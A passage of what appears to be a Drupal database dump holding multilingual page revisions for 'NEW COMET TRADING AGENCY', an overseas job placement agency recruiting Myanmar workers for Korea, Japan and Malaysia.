style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 182, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 182, 'ja', 0, '<h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</strong></h3><h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong><img src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418.jpg\" data-entity-uuid=\"11bdd5ab-02ab-46db-adb5-ee71d641622a\" data-entity-type=\"file\"></strong></h3><h6 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。<o:p></o:p><o:p></o:p></h6>', '', 'full_html'),
('page', 0, 1, 182, 'ko', 0, '<div class=\"flex flex-grow flex-col gap-3\"><div class=\"min-h-[20px] flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><h3>\"NEW COMET TRADING AGENCY\" 웹사이트에 오신 것을 환영합니다!!!!&nbsp;</h3><img data-entity-uuid=\"7015f95e-7234-408a-a9ee-075b30f18bd4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418_0.jpg\"><p>\"NEW COMET TRADING AGENCY\" 웹사이트 방문에 감사드립니다! 저희가 여러분을 여기에 맞이할 수 있어 기쁩니다. 자유롭게 웹사이트를 탐색하시고 제공하는 서비스와 기회에 대해 더 자세히 알아보세요. 질문이나 도움이 필요하신 경우 언제든지 저희에게 연락해주십시오. 여러분의 목표 달성을 위한 여정에서 도움을 드리기 위해 준비되어 있습니다.</p><p>저희 해외 취업 대행사는 현재 한국, 일본, 말레이시아 등에서 다양한 채용 정보를 소개하고 있습니다.</p></div></div></div>', '', 'full_html'),
('page', 0, 1, 205, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 205, 'ja', 0, '<h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</strong></h3><h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong><img src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418.jpg\" data-entity-uuid=\"11bdd5ab-02ab-46db-adb5-ee71d641622a\" data-entity-type=\"file\"></strong></h3><h6 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。<o:p></o:p><o:p></o:p></h6>', '', 'full_html'),
('page', 0, 1, 205, 'ko', 0, '<div class=\"flex flex-grow flex-col gap-3\"><div class=\"min-h-[20px] flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><h3>\"NEW COMET TRADING AGENCY\" 웹사이트에 오신 것을 환영합니다!!!!&nbsp;</h3><img data-entity-uuid=\"7015f95e-7234-408a-a9ee-075b30f18bd4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418_0.jpg\"><p>\"NEW COMET TRADING AGENCY\" 웹사이트 방문에 감사드립니다! 저희가 여러분을 여기에 맞이할 수 있어 기쁩니다. 자유롭게 웹사이트를 탐색하시고 제공하는 서비스와 기회에 대해 더 자세히 알아보세요. 질문이나 도움이 필요하신 경우 언제든지 저희에게 연락해주십시오. 여러분의 목표 달성을 위한 여정에서 도움을 드리기 위해 준비되어 있습니다.</p><p>저희 해외 취업 대행사는 현재 한국, 일본, 말레이시아 등에서 다양한 채용 정보를 소개하고 있습니다.</p></div></div></div>', '', 'full_html'),
('page', 0, 1, 206, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 206, 'ja', 0, '<h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</strong></h3><h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong><img src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418.jpg\" data-entity-uuid=\"11bdd5ab-02ab-46db-adb5-ee71d641622a\" data-entity-type=\"file\"></strong></h3><h6 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。<o:p></o:p><o:p></o:p></h6>', '', 'full_html'),
('page', 0, 1, 206, 'ko', 0, '<div class=\"flex flex-grow flex-col gap-3\"><div class=\"min-h-[20px] flex items-start overflow-x-auto whitespace-pre-wrap break-words flex-col gap-4\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><h3>\"NEW COMET TRADING AGENCY\" 웹사이트에 오신 것을 환영합니다!!!!&nbsp;</h3><img data-entity-uuid=\"7015f95e-7234-408a-a9ee-075b30f18bd4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418_0.jpg\"><p>\"NEW COMET TRADING AGENCY\" 웹사이트 방문에 감사드립니다! 저희가 여러분을 여기에 맞이할 수 있어 기쁩니다. 자유롭게 웹사이트를 탐색하시고 제공하는 서비스와 기회에 대해 더 자세히 알아보세요. 질문이나 도움이 필요하신 경우 언제든지 저희에게 연락해주십시오. 여러분의 목표 달성을 위한 여정에서 도움을 드리기 위해 준비되어 있습니다.</p><p>저희 해외 취업 대행사는 현재 한국, 일본, 말레이시아 등에서 다양한 채용 정보를 소개하고 있습니다.</p></div></div></div>', '', 'full_html'),
('announcement', 0, 3, 6, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 9, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ 